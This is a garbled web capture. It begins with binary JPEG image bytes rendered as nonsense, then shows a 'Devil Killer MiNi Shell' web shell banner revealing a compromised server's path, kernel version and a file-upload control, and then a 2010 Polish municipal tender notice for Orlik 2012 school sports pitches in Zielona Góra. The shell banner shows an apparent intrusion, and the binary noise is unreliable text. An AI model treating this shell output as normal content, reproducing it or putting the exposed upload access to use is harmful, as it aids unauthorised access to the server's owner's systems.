JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100628/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100628/184876-N-2010.html

<p class="kh_header"><b>Zielona Góra: Moje Boisko Orlik 2012 - budowa boisk ze sztuczną nawierzchnią w Gimnazjum nr 7 przy ul. Zachodniej w Zielonej Górze</b><br>
<b>Numer ogłoszenia: 184876 - 2010; data zamieszczenia: 28.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta , ul. Podgórna 22, 65-424 Zielona Góra, woj. lubuskie, tel. 0684564100,4564406 do 08, faks 068 4564155, 4564455.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zielona-gora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Moje Boisko Orlik 2012 - budowa boisk ze sztuczną nawierzchnią w Gimnazjum nr 7 przy ul. Zachodniej w Zielonej Górze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest realizacja zadania Moje Boisko Orlik 2012 - budowa boisk        ze sztuczną nawierzchnią w Gimnazjum nr 7 przy ul. Zachodniej w Zielonej Górze.
2.	Lokalizacja: Zielona Góra, ul. Zachodnia 63, dz. nr 112/2, obr. 26.
3.	Zakres przedmiotu zamówienia:
3.1.Budowa boiska do piłki nożnej o wymiarach 30,0 m x 62,0m (1860m2). 
1)      Nawierzchnia do piłki nożnej; nawierzchnia syntetyczna typu sztuczna trawa o właściwościach 
          i technologii układania określonych w dokumentacji projektowej,
2)       Parametry nawierzchni:
-         wysokość włókna min. 60 mm (wypełnienie  trawy zgodnie z badaniem specjalistycznego 
          laboratorium np. Labosport) 
-         typ włókna: monofil
-         skład chemiczny włókna; polietylen
-         ciężar włókna: min. 11.000 Dtex,
-         gęstość trawy: min. 97.000 włókien /m2
3)       Podbudowa przepuszczalna z tłucznia kamiennego na warstwie odsączającej,
4)       Obrzeża betonowe na ławie betonowej B15 oddzielające sąsiednie elementy terenu od płyty  
          boiska,
5)       Wyposażenie 
-         bramki aluminiowe 2*5m mocowane w tulejach z siatkami - 2 kpl.
-         chorągiewki przegubowe - 4 sztuki.
3.2. Budowa boiska wielofunkcyjnego o wymiarach 19,1 x 32,1 m (613,1m2)
1)       Nawierzchnia boiska wielofunkcyjnego - nawierzchnia poliuretanowa gr.10-11mm wykonana na 
          warstwie stabilizującej typu ET gr.35mm w technologii natrysku  o gr. 2-3mm  dwukolorowego 
          o właściwościach i technologii układania  określonych w dokumentacji projektowej
2)       Podbudowa przepuszczalna z tłucznia kamiennego na warstwie odsączającej,
3)       Obrzeża betonowe na ławie betonowej B15 oddzielające sąsiednie elementy terenu od płyty  
          boiska,
4)      Wyposażenie do piłki koszykowej - 6 kpl.
-         obręcz do koszykówki standard z siatką  łańcuchową, 
-         tablica do koszykówki epoksydowa o wym. 105 x 180cm z mechanizm regulacji wysokości,
-         konstrukcja do koszykówki dwusłupowa, montowana w tulejach.
5)       Wyposażenie  do piłki siatkowej -1 kpl.
-         słupki  stalowe malowane proszkowo, wielofunkcyjne  z krzesełkiem sędziowskim,
-         siatka do siatkówki.
3.3 Ogrodzenie panelowe (1560m2) 
Ogrodzenie boisk i kortów o wys. 4m z paneli prostych o standartowych wymiarach,   zamontowanych  jeden na drugim ( np. 2030*2500mm) na  słupkach o profilu 80*40*3mm i wys. 5,0m za pomocą zestawów montażowych , wyposażone w bramy o wym.2,5*2,5m (szt.4) i furki o wym. 1,5*2,0m (szt.4) z wypełnieniem panelowym. Panele zgrzewane z podwójnych drutów poziomych i pojedynczych poziomych o średnicy min. d=2*6+5mm. Rozstaw prętów 50*200mm. Całość ogrodzenia ocynkowana ogniowo. 
3.4 Piłkochwyty  l= 2*24,0m , h=6,0m 
Piłkochwyty systemowe na słupkach aluminiowych wzmocnionych 80*80*3mm i wys. h=6,7m, ze stężeniami bocznymi, osadzone w stopach betonowych  z betonu B20 za pomocą tulei, siatka polipropylenowa  zielona o oczkach 10*10cm i  gr. 4,75mm.
3.5. Oświetlenie boisk  i kortów
1)   Zasilanie - zalicznikowa linia kablowa  YKY 5*16mm2 (49,0m) z RG do RT sterującej  oświetleniem kompleksu boisk, kortów.
2)   Oświetlenie - oświetlenie boisk i kortów projektorami ze źródłem światła o mocy 250W 
          szt. 24  i  400W szt.16 ( korty),  zamocowane na 14 anodowanych aluminiowych masztach 
           o wysokości 12,0m. Kablowe linie oświetlenia boisk  i kortów - kabel YKY 5*6mm2 (698m).
3)       Instalacje wewnętrzne sanitariatu zaplecza -  przewody YDYp 3*1,5mm2 (21,0m) w bruzdach.
3.6  Elementy zagospodarowania terenu
1)   Ciągi komunikacyjne - chodniki i place przy boiskach (765,9m2) wykonane z kostki typu 
          polbruk gr.6cm,na warstwie podsypkowej z piasku gr.5cm i podsypce cementowo-piaskowej
          gr.5cm w obramowaniu z obrzeża betonowego 8*30cm  (85,4m) na ławie z betonu B15, 
2)   Bieżnia czterotorowa o wymiarach 73,0 x 5,0 m (365m2) i nawierzchni poliuretanowej 
 gr.12-14mm w technologii natrysku z granulatem EPDM ułożona na warstwie stabilizującej   
 typu ET gr.35mm i podbudowie przepuszczalnej z tłucznia kamiennego na warstwie 
 odsączającej, w obramowaniu z obrzeża betonowego na ławie betonowej B15.
3)    Skocznia w dal o wymiarach 3.75 x 8,0 m (30m2) w obramowaniu z deski impregnowanej,
           wypełniona piaskiem kwarcowym (rzecznym) na warstwie przepuszczalnej z kruszywa
           grubego, wyposażona w deskę do skoku zamontowaną w bieżni.  
4)     Rzutnia do pchnięcia kulą - koło rzutów z betonu B20 wyposażone w próg drewniany, pole
           rzutów o nawierzchni z trawy z rolki na podbudowie piaszczystej.
5)   Korty tenisowe - modernizacja istniejącej nawierzchni i dobudowa nowej, nawierzchnia 
 z maczki ceglanej na warstwie miału kamiennego (1307,1m2) i nowej podbudowie
 przepuszczalnej z tłucznia kamiennego na warstwie odsączającej (191,1m2), w obramowaniu 
 z obrzeża betonowego (145,8m) na ławie  betonowej B15. Wyposażenie: słupki aluminiowe 
 z tulejami i deklami oraz  siatka - 2 kpl.
6)    Mała architektura - ławki ( szt.13) bez oparcia z siedziskami drewnianymi impregnowanymi 
           o dł.2,0m, przymocowanymi do podpór żelbetowych z betonu B30 i osadzonych w podłożu za 
           pomocą  betonu B15 oraz kosze na śmieci metalowe na konstrukcji z rury d=48/3,2mm 
           (szt.3) o poj.35l z podstawą betonową prefabrykowaną, ocynkowane ogniowo i malowane
           proszkowo. Zakres robót związanych z małą architekturą obejmuje również przestawienie 
           betonowych stołów do tenisa stołowego ( 2kpl)
7)      Zieleń  - trawniki wokół boisk i przy ciągach komunikacyjnych z darni trawnikowej dostarczonej
           w rolkach (339m2) układanej na warstwie humusu (ziemi urodzajnej) po 
           uprzednim wyprofilowaniu podłoża.  Na terenach zielonych przy ogrodzeniu posadzić krzewy
           iglaste o wys. min.0,8m (185 szt) i drzewa form kulistych o obw. pnia 14-16cm na wys.1,3m
           wraz z opalikowaniem i  nawadnianiem (8 szt).
3.7. Remont  zaplecza sanitarnego sali gimnastycznej dla potrzeb kompleksu boisk.
1)       Remont węzła sanitarnego - w ramach prac wydzielić z pomieszczenia natrysków sanitariat dla
          niepełnosprawnych (3,6m2) oraz WC damskie (2,0m2)  wraz z wyposażeniem.
2)   Schody i pochylnia dla niepełnosprawnych - schody i ściany  podjazdu z betonu B15 
          (12,01m3), nawierzchnia podjazdu z polbruku gr.6cm (20,3m2), poręcze i balustrady wraz 
          z wyposażeniem.
3.8. Budowa infrastruktury technicznej sanitarnej
1)   Kanalizacja deszczowa - przyłącze  z rur PCV d=200/5,9mm,  klasy SN8 (101,0m) ze
           studzienkami d=315mm  i kinetą  PE ( szt.3).  
2)      Sieć wodociągowa - przyłącze wodociągowe do kortów  z rur PE SDR 17d=25mm (61,5m) ze
           studzienką Dn400 i hydrantem ogrodowym d=25mm.
3)       Drenaż odwadniający - instalacja odwodnienia z rur drenarskich karbowanych PVC-U d=80mm
           (354,5m) z filtrem z włókna  syntetycznego  włączona do przewodów zbiorczych z rur PVC 
           d=160 klasy SN8 (62,0m), studzienki połączeniowo-rewizyjne d=315mm z kinetą PP(szt.3). 
           Odprowadzenie wody do  skrzynek retencyjno-rozsączających  (5,4m3) przez studzienkę 
           d=315mmz filtrem.    
4)      Instalacje wod-kan sanitariatu dla niepełnosprawnych oraz WC - rurociągi wody zimnej i ciepłej
           z rur zgrzewanych d=15mm (25,0m), rury kanalizacyjne z PVC d=50 (12,0m) i 110mm (20,0m).
3.9. Roboty przygotowawcze i ziemne
1)       Wycinka i karczowanie drzew  (szt. 8) 
2)   Rozbiórka chodników (140m2), obrzeży (704m), naw, bitum. (94m2) wraz z wywozem
           i utylizacją (57,2 t),
3)   Zdjęcie humusu (3559m2), wykopy pod konstrukcje naw. (1256,0m3) wraz z wywozem 
           i składowaniem nadmiaru gruntu i humusu na wysypisku ( 1933m3).
4.	Wykonawca zobowiązany jest przedstawić wraz z ofertą dokumenty potwierdzające spełnienie  warunków jakościowych nawierzchni ( parametry): 
4.1. Dokumenty dotyczące nawierzchni poliuretanowej:
1)      Certyfikat lub deklaracja zgodności z normą PN-EN 14877:2008, lub aprobata techniczna ITB,  
          lub rekomendacja techniczna ITB, lub wyniki badań specjalistycznego laboratorium          potwierdzające parametry oferowanej nawierzchni np. Labosport, lub dokument równoważny.
2)      Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
3)      Atest PZH lub równoważny dla oferowanej nawierzchni.
4) Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy                                   na   realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą 
          nawierzchnię.
4.2 Dokumenty dotyczące nawierzchni z trawy syntetycznej:
1)      Raport z badań przeprowadzonych przez laboratorium (Labosport lub ISA-Sport lub Sports 
          Labs Ltd), dotyczący oferowanej nawierzchni, potwierdzający zgodność jej parametrów   
          z FIFA Quality Concept for Football Turf (dostępny na FIFA.com).
2)      Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1:2008, lub aprobata techniczna 
          ITB, lub rekomendacja techniczna ITB.
3)	Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
4)	Atest PZH lub równoważny dla oferowanej nawierzchni i wypełnienia.
5)	Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na realizowaną  inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię. 
5.	 Wykonawca udzieli gwarancji na wykonany przedmiot zamówienia od dnia odebrania przez        Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego na okres       minimum:
-    60 miesięcy na nawierzchnie syntetyczne oraz granulat użyty do wypełnienia nawierzchni 
          ze sztucznej trawy,
-         36 miesięcy na roboty budowlane.
6.	  Cały zakres prac wykonać zgodnie dokumentacją techniczną opracowaną przez Biuro Projektowe Basista & Krasucka oraz z  wytycznymi zapisanymi 
w Szczegółowych Specyfikacjach Technicznych załączonych do dokumentacji technicznej stanowiących integralną część SIWZ. 
7.	  Szczegółowy opis przedmiotu zamówienia i zakresu robót stanowią załączniki: 
1)       Załącznik nr 11 do SIWZ; Przedmiary robót
2)       Załącznik nr 12 do SIWZ; Dokumentacja projektowa
3)       Załącznik nr 13  do SIWZ; Specyfikacje Techniczne wykonania i odbioru robót .
8.	   W celach informacyjnych Zamawiający załącza Przedmiary robót stanowiące załącznik nr 11 do  SIWZ.
9.	  Wyszczególnienie elementów robót stanowiących podstawę do rozliczenia wykonanych robót 
zawiera Zbiorcza Tabela Elementów Rozliczeniowych stanowiąca załącznik 9 do SIWZ,
sporządzona na podstawie DT, Specyfikacji technicznych z dokładnością do 
 dwóch miejsc po przecinku.
10.	 Cena wykonania przedmiotu zamówienia 
1)    Wykonawca biorący udział w niniejszym przetargu powinien zaoferować taką cenę, która
 będzie obejmowała wszystkie koszty wraz z obsługą geodezyjną, i składniki związane z realizacją zamówienia, zgodnie DT, Specyfikacjami technicznymi, w tym m.in. podatek VAT, upusty, rabaty. 
2)   Wykonawca określi cenę oferty brutto, która stanowić będzie wynagrodzenie ryczałtowe 
za realizację całego przedmiotu zamówienia, podając ją w zapisie liczbowym i słownie           z dokładnością do grosza (do dwóch miejsc po przecinku).
3)     Zakres prac i kosztów własnych  Wykonawcy w zakresie objętym proponowaną ceną ofertową          przedmiotu zamówienia obejmuje również:
4)   Organizację, zagospodarowanie i utrzymanie zaplecza budowy, roboty przygotowawcze                           i porządkowe;
5)       Zabezpieczenie i wygrodzenie terenu robót oraz zapewnienie dozoru mienia na terenie robót 
6)       Wykonanie powykonawczej dokumentacji technicznej oraz mapy geodezyjnej;   
7)       Koszty związane z zużyciem wody i energii elektrycznej na potrzeby budowy;
8)     Zapewnienie i ponoszenie kosztów związanych z usunięciem oraz składowaniem materiałów          rozbiórkowych i innych odpadów powstałych w czasie realizacji przedmiotu zamówienia;
9)     Po zakończeniu robót uporządkowaniu terenu, w terminie nie późniejszym niż termin odbioru         przedmiotu zamówienia;
11.	UWAGA: 
         Pozycje 3.3.1, 3.3.2 oraz 3.4. SIWZ spełniają wymogi typowej  Specyfikacji Istotnych Warunków Zamówienia  na  wykonanie boisk sportowych w ramach budowy kompleksu sportowego Moje Boisko Orlik - 2012 opublikowanej przez Ministerstwo Sportu i Turystyki na stronie orlik2012.pl w dniu 15 stycznia 2010 w treści:
	- rozdziału 2, punkt 2.1 i 2.2, 
	- rozdziału 11, punkt 4.A i 4.B.
12.	  Wykonawca winien dostarczyć Zamawiającemu przed podpisaniem umowy:
12.1.	harmonogram rzeczowo-finansowy;
12.2.	kopię aktualnej polisy ubezpieczenia od odpowiedzialności cywilnej na minimalną wartość 500.000,00 zł w zakresie prowadzonej działalności gospodarczej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 95.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie 20.000,00 zł (słownie: dwadzieścia tysięcy złotych 00/100) przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>brak wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 2 ustawy pzp oraz spełniający szczegółowe warunki udziału w postępowaniu:
1)    posiadają wiedzę i doświadczenie w realizacji w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,                                   co najmniej:
a)   	dwóch zadań w zakresie wykonania robót budowlanych polegających na budowie boisk piłkarskich z nawierzchnią z trawy syntetycznej o powierzchni min. 1000 m2 wraz z elementami zagospodarowania terenu (chodniki, ogrodzenia, oświetlenie), oraz 
b) 	dwóch zadań w zakresie wykonania robót budowlanych polegających na budowie boisk 
z nawierzchnią poliuretanową o powierzchni min. 500 m2 wraz z elementami zagospodarowania terenu (chodniki, ogrodzenia, oświetlenie)
	udokumentowanych, że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6.1.3), 6.1.6) i 6.1.10) SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 3 ustawy pzp oraz spełniający szczegółowe warunki udziału w postępowaniu:
1)       rozkładarka do poliuretanu;
2)	maszyną do wykonania natrysku strukturalnego; 
3)	mikserem do przygotowania mieszanki poliuretanowej; 
4)	urządzeniem do natryskowego malowania linii separacyjnych boisk; 
5)	specjalistyczną maszyną do dawkowania i wcierania piasku i granulatu. 
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6.1.3), 6.1.9) - 6.1.10) SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 3 ustawy pzp oraz spełniający szczegółowe warunki udziału w postępowaniu:
1)  dysponują osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć 
w wykonywaniu zamówienia, należącymi do właściwej izby samorządu zawodowego  posiadającymi zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2006 r. 
Nr 156, poz. 1118 - tekst jednolity z późn. zm.) uprawnienia do kierowania robotami budowlanymi w specjalności:
a) 	konstrukcyjno - budowlanej bez ograniczeń;
b) 	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych co najmniej w ograniczonym zakresie; 
c) 	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych co najmniej w ograniczonym zakresie 
lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów; 

Ocena spełniania warunku udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6.1.3), 6.1.7) - 6.1.8) , 6.1.10) SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>brak wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
